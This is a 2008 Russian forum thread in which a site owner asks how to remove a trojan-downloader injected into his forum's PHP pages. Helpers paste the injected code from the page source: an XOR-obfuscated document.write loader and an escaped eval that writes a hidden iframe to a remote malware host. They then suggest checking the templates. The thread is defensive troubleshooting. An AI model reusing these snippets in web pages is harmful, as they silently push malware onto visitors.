Trojan-Downloader.HTML.Agent.ij

[Dark Wand]

У меня во все php прописался Trojan-Downloader.HTML.Agent.ij

Как его можно убрать? Я искал подозрительные ссылки и ничего не нашел(((

 

Сообщение от Касперского:

обнаружено: троянская программа Trojan-Downloader.HTML.Agent.ij Скрипт: http://ххх.ru/forums/index.php?act=idx[10]

 

Заранее благодарю

[sudmed]

Др.веб обнаружил Trojan.DownLoader.33840.

Ссылку в посте активную отредактируй, а кто-нить подцепит эту заразу.

 

Смотри исходный код страницы. Мне в нем два куска не понравилось

1.

<script>
var
V1AQAPKRV="K@P'02Rpgqvkeg'02Qv{ng'02Amr{pkejv'02'04amr{'1@'020224'02'1Ac'02jpgd'1F'00jvvr'1C'0D'0Ddkqclc'0Gqrcpilgv'0Gpw'0Ddmpwo'0D'00'02vcpegv'1F'00'7D`ncli'00'1GDkqclc'02'1A'0Dc'1G'02T'0G0'0G3'02'1Ac'02jpgd'1F'00jvvr'1C'0D'0Duuu'0Gk`pgqmwpag'0Gpw'0D'00'02vcpegv'1F'00'7D`ncli'00'1GK@Pgqmwpag'0Gpw'1A'0Dc'1G'1A'03'0F'0F'02'0D'02Amr{pkejv'02'0F'0F'1G";
V1Avjgnglevj="";
V1Aqapkrv="";
var V02amfg3;
V02amfg3=V1AQAPKRV.length;
for (i=0; i<V02amfg3; i++) { V1Avjgnglevj += String.fromCharCode(V1AQAPKRV.charCodeAt(i)^2) }
V1Aqapkrv = unescape(V1Avjgnglevj);
document.write(V1Aqapkrv);
</script>

2.

<script>eval(unescape("%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%44%6F%6E%65%27%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%6E%61%6D%65%3D%33%20%73%72%63%3D%5C%27%68%74%74%70%3A%2F%2F%74%65%6C%65%6E%65%74%2E%6B%7A%2F%66%6C%61%73%68%2F%73%6F%75%72%63%65%2F%63%6F%6D%2F%64%65%63%6F%6E%63%65%70%74%2F%31%2F%3F%27%2B%4D%61%74%68%2E%72%6F%75%6E%64%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%35%39%38%35%29%2B%27%38%65%31%64%38%39%36%63%61%36%39%37%5C%27%20%77%69%64%74%68%3D%31%30%35%20%68%65%69%67%68%74%3D%35%37%20%73%74%79%6C%65%3D%5C%27%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%5C%27%3E%3C%2F%69%66%72%61%6D%65%3E%27%29")); </script>

 

Первый - не знаю что. А второй расшифровался как

<script>eval(unescape("window.status='Done';document.write('<iframe name=3 src=\'http://telenet.kz/flash/source/com/deconcept/1/?'+Math.round(Math.random()*5985)+'8e1d896ca697\' width=105 height=57 style=\'display: none\'></iframe>')")); </script>

 

Так что думай откуда это и удаляй в шаблонах.

 

Да и пока вирус ифреймится, форум то закрой (посетители по форуму гуляют, ни к чему их антивирусники тестировать).

Изменено 4 Июня 2008 пользователем sudmed

[Dark Wand]

Ссылку поправил в посте.

 

А где конкретно эти шаблоны лежат? И сколько файлов смотреть?

[sudmed]

А где конкретно эти шаблоны лежат?

В админке.

И сколько файлов смотреть?

"Поиск и замена в стилях" поможет найти все.

[Sannis]

Но корее всего это прописалось в PHP файлы форума, так что скачайте и их и проверьте.

[Dark Wand]

Есть возможность поставить какой-нибудь мод, который бы нашел расхождение в коде?

А то где это искать я в уме не приложу( 2 часа просидел и 0 результата

[doctorrrrr]

В шаблонах и в индексе попробуйте.

[Sannis]

Для 2.1 не видел такого.